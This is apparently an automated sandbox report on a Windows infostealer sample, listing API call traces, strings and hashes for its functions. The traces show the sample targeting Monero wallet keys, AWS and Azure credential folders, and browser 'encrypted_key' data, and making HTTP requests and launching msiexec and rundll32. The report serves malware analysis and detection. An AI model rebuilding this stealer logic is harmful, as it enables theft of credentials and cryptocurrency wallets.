                            • lstrcat.KERNEL32(?,00000000), ref: 0034D2D4
                            • lstrcat.KERNEL32(?,00361490), ref: 0034D2E3
                              • Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
                              • Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885
                            • lstrlen.KERNEL32(?), ref: 0034D32A
                            • lstrlen.KERNEL32(?), ref: 0034D339
                              • Part of subcall function 0035AA70: StrCmpCA.SHLWAPI(00FB9918,0034A7A7,?,0034A7A7,00FB9918), ref: 0035AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0034D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 98fd154c3290806baf3ecfb263412e2c641a2a631e9a95af4a1e7e5185117c18
                            • Instruction ID: 6cc70c54176aee171ee1e01ad9cdcad9908209247e721559581d962d8a02548d
                            • Opcode Fuzzy Hash: 98fd154c3290806baf3ecfb263412e2c641a2a631e9a95af4a1e7e5185117c18
                            • Instruction Fuzzy Hash: 95E123719105089BDB06EBA0DD96EEE7778BF14301F104255F907BB0A1EF35AA0DEB62
                            Function 0034C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FBD378,00000000,?,0036144C,00000000,?,?), ref: 0034CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0034CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0034CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0034CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0034CAD9
                            • StrStrA.SHLWAPI(?,00FBD288,00360B52), ref: 0034CAF7
                            • StrStrA.SHLWAPI(00000000,00FBD3A8), ref: 0034CB1E
                            • StrStrA.SHLWAPI(?,00FBDB00,00000000,?,00361458,00000000,?,00000000,00000000,?,00FB98C8,00000000,?,00361454,00000000,?), ref: 0034CCA2
                            • StrStrA.SHLWAPI(00000000,00FBDB20), ref: 0034CCB9
                              • Part of subcall function 0034C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0034C871
                              • Part of subcall function 0034C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0034C87C
                            • StrStrA.SHLWAPI(?,00FBDB20,00000000,?,0036145C,00000000,?,00000000,00FB9908), ref: 0034CD5A
                            • StrStrA.SHLWAPI(00000000,00FB97E8), ref: 0034CD71
                              • Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B46), ref: 0034C943
                              • Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B47), ref: 0034C957
                              • Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B4E), ref: 0034C978
                            • lstrlen.KERNEL32(00000000), ref: 0034CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0034CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 10d42148a7489d9cb3a2c1a739ac8f782f5897011eb568e1ff776c007043f135
                            • Instruction ID: 78869cfef26208ae8beba1c1cf30f449c263a22489987602f966919f9a5a9575
                            • Opcode Fuzzy Hash: 10d42148a7489d9cb3a2c1a739ac8f782f5897011eb568e1ff776c007043f135
                            • Instruction Fuzzy Hash: 47E1F271910508ABDB16EBA0DC95FEEB778BF14301F404259F9067B1A1EF306A4EEB61
                            Function 00358320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • RegOpenKeyExA.ADVAPI32(00000000,00FBB2E8,00000000,00020019,00000000,003605B6), ref: 003583A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
                            • wsprintfA.USER32 ref: 00358459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0035847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0035848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00358499
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
                            • Instruction ID: 64e09cb10532675955416ba166dd4172111353a768a202743fd145ba21c65c0d
                            • Opcode Fuzzy Hash: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
                            • Instruction Fuzzy Hash: 6C812D7191011CABEB29DB50CC91FEAB7B8FF18701F008299E909A6150DF756B89DFA1
                            Function 00354D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00354DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00354DCD
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
                              • Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943
                            • lstrcat.KERNEL32(?,00000000), ref: 00354E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00354E59
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
                              • Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
                              • Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00354EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00354EE5
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 003549B0
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,003608D2), ref: 003549C5
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 003549E2
                              • Part of subcall function 00354910: PathMatchSpecA.SHLWAPI(?,?), ref: 00354A1E
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,00FBE8E8), ref: 00354A4A
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FF8), ref: 00354A5C
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A70
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FFC), ref: 00354A82
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A96
                              • Part of subcall function 00354910: CopyFileA.KERNEL32(?,?,00000001), ref: 00354AAC
                              • Part of subcall function 00354910: DeleteFileA.KERNEL32(?), ref: 00354B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: edeb8cb788e2cb21778635a583bb2b200bfc4e4f5cb0857c547bc66e0cc59f40
                            • Instruction ID: 9df7d16568f9bd1365522a4dbe87656185509a057c8722e2541d842716c7d0f2
                            • Opcode Fuzzy Hash: edeb8cb788e2cb21778635a583bb2b200bfc4e4f5cb0857c547bc66e0cc59f40
                            • Instruction Fuzzy Hash: 8C41D4BA95020867DB15F760EC47FED3378AB24705F004594B9896A0C5FEB46BCC9BA2
                            Function 00359010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0035906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 813014bc94cbd3130b8a0471f8668d1cd679302ce8c202f73d42ea34207e858d
                            • Instruction ID: 00c54de52472c1af8619b29a67ec44cc24e5eb1e9bf51613a645cfcb687d5a5e
                            • Opcode Fuzzy Hash: 813014bc94cbd3130b8a0471f8668d1cd679302ce8c202f73d42ea34207e858d
                            • Instruction Fuzzy Hash: 2D71DC71910208EBDB04DFE4DC89FEEB7B8BB58701F108509F915AB294DB34A949DB61
                            Function 00352E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003531C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0035335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003534EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: d13fb5f86b875b8ce5e323329895a82a49a5eb6682a90b9b2cc2ffc6f28a51cd
                            • Instruction ID: 73736bfba19736b72ac644e659882f13e1e9abfd61435ea787e933adc3174d80
                            • Opcode Fuzzy Hash: d13fb5f86b875b8ce5e323329895a82a49a5eb6682a90b9b2cc2ffc6f28a51cd
                            • Instruction Fuzzy Hash: C912F1718005189ADB1AEBA0DC92FDEB778BF14301F504259F9067A1A1EF742B4EDF52
                            Function 003552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
                              • Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346303
                              • Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
                              • Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
                              • Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
                              • Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
                            • lstrlen.KERNEL32(00000000), ref: 0035532F
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
                            • lstrlen.KERNEL32(00000000), ref: 00355383
                            • lstrlen.KERNEL32(00000000), ref: 003553AE
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: d06fd0f234cbf332e502fefcead6ac27791d9d2765f33ba15e3ce233fe14a157
                            • Instruction ID: 06836b89473d19304ca41b0cd0c9102d4ad93e8a3fb7221891980223c535d4c9
                            • Opcode Fuzzy Hash: d06fd0f234cbf332e502fefcead6ac27791d9d2765f33ba15e3ce233fe14a157
                            • Instruction Fuzzy Hash: 89510C709105489BDB16FF60C996EED7B79AF10302F504118EC066E5A2EF346B4DEB62
                            Function 003512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 21d1b0276d02e28b6fc928cff9ee26574f265ca97cc77ae55edc8a3005d20798
                            • Instruction ID: ad10f30ed8ce4fbb0654131825815dc0f1cbc547c870dd352fe43c733e495079
                            • Opcode Fuzzy Hash: 21d1b0276d02e28b6fc928cff9ee26574f265ca97cc77ae55edc8a3005d20798
                            • Instruction Fuzzy Hash: 96C1C7B590020C9BCB15EF60DC89FEA7778BF64305F004599F90A6B161EB70AA89DF91
                            Function 00354280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003542EC
                            • lstrcat.KERNEL32(?,00FBE1A8), ref: 0035430B
                            • lstrcat.KERNEL32(?,?), ref: 0035431F
                            • lstrcat.KERNEL32(?,00FBD108), ref: 00354333
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F
                              • Part of subcall function 00349CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 003593C0: GlobalAlloc.KERNEL32(00000000,003543DD,003543DD), ref: 003593D3
                            • StrStrA.SHLWAPI(?,00FBE2B0), ref: 003543F3
                            • GlobalFree.KERNEL32(?), ref: 00354512
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
                              • Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
                              • Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F
